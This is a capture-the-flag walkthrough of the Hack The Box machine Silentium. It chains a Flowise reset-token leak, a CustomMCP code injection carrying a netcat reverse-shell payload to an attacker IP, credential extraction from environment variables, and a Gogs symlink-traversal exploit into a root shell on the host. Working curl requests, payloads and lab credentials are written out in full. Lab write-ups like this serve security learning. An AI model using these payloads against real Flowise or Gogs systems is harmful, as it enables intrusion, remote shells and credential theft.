Silentium WriteUp
Table of Contents
Silentium is a π© Easy machine on Hack The Box, Season 10. The attack chain starts by enumerating subdomains to discover a Flowise 3.0.5 instance, abuses an unauthenticated password reset token leak to gain admin access, injects JavaScript through the CustomMCP node to achieve RCE inside a Docker container, extracts credentials from environment variables, and escalates to root by exploiting a symlink traversal vulnerability in Gogs v0.13.0.
πΊοΈ Attack Chain
Reconnaissance β Ports 22, 80
β
βΌ
Subdomain enumeration β staging.silentium.htb (Flowise 3.0.5)
β
βΌ
CVE-2025-58434 β Leaked reset token β ben@silentium.htb β Flowise admin
β
βΌ
CVE-2025-59528 β CustomMCP code injection β RCE in Docker container (root)
β
βΌ
Environment variables β SMTP_PASSWORD=r04D!!_R4ge β SSH as ben
β
βΌ
Internal port 3001 β Gogs v0.13.0 β CVE-2025-8110 (symlink traversal)
β
βΌ
RCE as root on the host β root π΄
π Reconnaissance
/etc/hosts Configuration
echo "10.129.33.247 silentium.htb" | sudo tee -a /etc/hosts
Port Scan
Phase 1, Fast TCP port discovery:
sudo nmap -p- --open -Pn --min-rate 5000 -oA ports -vvv silentium.htb
Phase 2, Version and script detection:
grep -oP '\d+/open' ports.gnmap | cut -d'/' -f1 | sort -u | tr '\n' ',' | sed 's/,$//' > ports.txt
sudo nmap -sCV -p$(cat ports.txt) -Pn -oA scan -vvv silentium.htb
| Port | Service | Detail |
|---|---|---|
22 | SSH | OpenSSH 9.6p1 (Ubuntu) |
80 | HTTP | nginx 1.24.0 (Ubuntu) |
Web Enumeration
The main site http://silentium.htb shows a static corporate asset management website. We can identify 3 potential users: Marcus, Ben, and Elena.
We enumerate virtual subdomains:
ffuf -ic -c -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://silentium.htb" -H "Host: FUZZ.silentium.htb" -fc 301
staging [Status: 200, Size: 3142]
π― We found
staging.silentium.htb. Adding it to/etc/hosts:
sudo sed -i 's/silentium.htb/silentium.htb staging.silentium.htb/' /etc/hosts
Visiting http://staging.silentium.htb shows the Flowise 3.0.5 AI agent builder interface.
User Enumeration
The login endpoint returns different responses for existing vs non-existing users, User Not found vs Incorrect Email or Password:
π― User
ben@silentium.htbexists in the system.
π Initial Access
CVE-2025-58434, Flowise Password Reset Token Leak
π§ Flowise β€ 3.0.12 exposes the
/api/v1/account/forgot-passwordendpoint which returns the full user object, including the password reset token, without requiring authentication. The vulnerability is triggered by adding thex-request-from: internalheader, which bypasses authentication checks.
We request a reset for ben@silentium.htb and capture the token:
curl -s -X POST http://staging.silentium.htb/api/v1/account/forgot-password \
-H "Content-Type: application/json" \
-H "x-request-from: internal" \
-d '{"user":{"email":"ben@silentium.htb"}}'
{
"id": "e26c9d6c-678c-4c10-9e36-01813e8fea73",
"email": "ben@silentium.htb",
"tempToken": "3EUlW37Q2asfL8EGS0jH3A2ngK6i3O3WTM0kkWWUbFjc5Zc6N3X651RuS2Nmkx1U",
"resetPasswordExpires": "2026-04-17T18:30:00.000Z"
}
We use the tempToken to set a new password:
curl -s -X POST http://staging.silentium.htb/api/v1/account/reset-password \
-H "Content-Type: application/json" \
-H "x-request-from: internal" \
-d '{"user":{"email":"ben@silentium.htb","tempToken":"3EUlW37Q2asfL8EGS0jH3A2ngK6i3O3WTM0kkWWUbFjc5Zc6N3X651RuS2Nmkx1U","password":"1Qwerty!"}}'
β Admin access to Flowise as
ben@silentium.htb:1Qwerty!.
CVE-2025-59528, CustomMCP Code Injection (CVSS 10.0)
π§ Flowise β₯ 2.2.7-patch.1 and < 3.0.6 allows arbitrary JavaScript execution through the CustomMCP node. The
mcpServerConfigparameter is passed unsanitized to Node.js’sFunction()constructor, allowing any authenticated user to execute code on the server with the Flowise process privileges (root inside the Docker container).
Set up the listener:
penelope -p 8443
Flowise uses cookie-based sessions. We log in saving the cookie and reuse it in the exploit:
curl -s -X POST http://staging.silentium.htb/api/v1/auth/login \
-H "Content-Type: application/json" \
-H "x-request-from: internal" \
-d '{"email":"ben@silentium.htb","password":"1Qwerty!"}' \
-c cookies.txt
curl -s -X POST http://staging.silentium.htb/api/v1/node-load-method/customMCP \
-H "Content-Type: application/json" \
-H "x-request-from: internal" \
-b cookies.txt \
-d '{"loadMethod":"listActions","inputs":{"mcpServerConfig":"({x:(function(){const cp=process.mainModule.require(\"child_process\");cp.exec(\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.100 8443 >/tmp/f\");return 1;})()} )"}}'
[x] Command executed
The listener receives the connection:
/ # id
uid=0(root) gid=0(root) groups=0(root)
/ # hostname
c78c3cceb7ba
β RCE as root inside the Docker container.
π Credential Extraction, Environment Variables
From the container, we list environment variables looking for credentials:
env
FLOWISE_USERNAME=ben
FLOWISE_PASSWORD=F1l3_d0ck3r
SMTP_PASSWORD=r04D!!_R4ge
SMTP_HOST=mailhog
SENDER_EMAIL=ben@silentium.htb
JWT_AUTH_TOKEN_SECRET=AABBCCDDAABBCCDDAABBCCDDAABBCCDDAABBCCDD
DATABASE_PATH=/root/.flowise
PORT=3000
...
π SSH credential found:
ben:r04D!!_R4ge
π Lateral Movement, SSH as ben
ssh ben@silentium.htb # r04D!!_R4ge
π© User Flag
cat ~/user.txt
π§ββοΈ Privilege Escalation, CVE-2025-8110
Internal Enumeration
From the ben SSH session, we look for internal services:
ss -tlnp
LISTEN 0 128 127.0.0.1:3001 0.0.0.0:*
We tunnel the port to access it from Kali:
ssh -f -N -L 3001:127.0.0.1:3001 ben@silentium.htb
Visiting http://127.0.0.1:3001 shows Gogs v0.13.0, a self-hosted Git server.
What is CVE-2025-8110?
π§ Gogs β€ v0.13.3 does not properly validate symbolic links when writing files to a repository. An authenticated attacker can create a symlink pointing to
.git/configand use thePutContentsAPI to overwrite that file through the symlink. By injecting a maliciouscore.sshCommanddirective, the command executes the next time Gogs performs internal Git operations with the process privileges, in this case,root.
Exploitation
Download the PoC:
git clone https://github.com/zAbuQasem/gogs-CVE-2025-8110
cd gogs-CVE-2025-8110
pip install -r requirements.txt
π‘ The script tries to auto-register a user, but Gogs has CAPTCHA enabled. Follow these manual steps:
- Register at
http://127.0.0.1:3001/user/sign_upwithtest:Password123!- Generate an API token at
http://127.0.0.1:3001/user/settings/applicationsβ Generate New Token- Comment out the registration call in
main():
# register(session, args.url, username, password) # commented: manual registration
login(session, args.url, username, password)
Set up the listener:
penelope -p 8443
Run the exploit against the tunneled Gogs instance:
python3 CVE-2025-8110.py -u http://127.0.0.1:3001 -lh 10.10.14.100 -lp 8443
[+] Exploit sent, check your listener!
The listener receives the shell:
root@silentium:~# id
uid=0(root) gid=0(root) groups=0(root)
root@silentium:~# hostname
silentium
β Root shell on the host obtained.
π΄ Root Flag
cat /root/root.txt
π Attack Chain Summary
| # | Technique | Tool | Result |
|---|---|---|---|
| 1 | Reconnaissance | nmap | Ports 22 and 80 (nginx) |
| 2 | Subdomain enumeration | ffuf | staging.silentium.htb β Flowise 3.0.5 |
| 3 | User enumeration | curl | ben@silentium.htb identified |
| 4 | Leaked reset token | CVE-2025-58434 | Flowise admin access |
| 5 | Docker RCE | CVE-2025-59528 (CustomMCP) | Shell as root in container |
| 6 | Credential extraction | env | ben:r04D!!_R4ge from environment variables |
| 7 | Lateral movement | ssh | Access as ben + User Flag π© |
| 8 | Gogs discovery | ss + SSH tunnel | Gogs v0.13.0 on internal port 3001 |
| 9 | Symlink traversal + config injection | CVE-2025-8110 PoC | .git/config overwritten |
| 10 | Root escalation | Gogs sshCommand | Shell as root + Root Flag π΄ |
See you in the next challenge.




